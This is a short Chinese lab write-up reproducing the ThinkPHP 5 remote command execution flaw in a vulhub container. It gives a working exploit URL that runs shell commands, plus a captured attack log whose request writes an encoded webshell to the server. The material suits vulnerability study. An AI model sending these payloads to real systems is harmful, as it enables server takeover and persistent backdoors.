【漏洞复现系列】ThinkPHP 5 远程命令执行

使用vulhub搭建环境：

https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce

启动docker容器：

docker-compose up -d

访问8080端口：

http://your-ip:8080

执行whoami命令：

http://xx.xx.xx.xx:8080/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=whoami

{
  "dst_host": "10.53.2.2",
  "dst_port": 80,
  "local_time": "2020-10-19 11:22:35.283207",
  "logdata": {
    "Headers": "{'accept-language': 'en-US, en; q=0.8, zh-Hans-CN; q=0.5, zh-Hans; q=0.3', 'accept-encoding': 'gzip, deflate', 'connection': 'Close', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'user-agent': 'Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', 'host': '117.50.11.67:20547', 'referer': 'http://117.50.11.67:20547//index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=php://filter/write=convert.base64-decode|string.rot13'}",
    "Method": "GET",
    "PATH": "//index.php",
    "http_args": {
      "function": [
        "call_user_func_array"
      ],
      "s": [
        "index/think\app/invokefunction"
      ],
      "vars[0]": [
        "file_put_contents"
      ],
      "vars[1][]": [
        "php://filter/write=convert.base64-decode|string.rot13/resource=sxf.php",
        "PD9jdWMgcmVlYmVfZXJjYmVndmF0KDApOyRuPSckX2NiZmdbImsiXSc7JG89ZmdlZ2JoY2NyZSgiJG4iKTtyaW55KCJyaW55KCRvKTsiKT8+dXJlcg=="
      ]
    }
  }

金麟岂是池中物，一遇风云便化龙！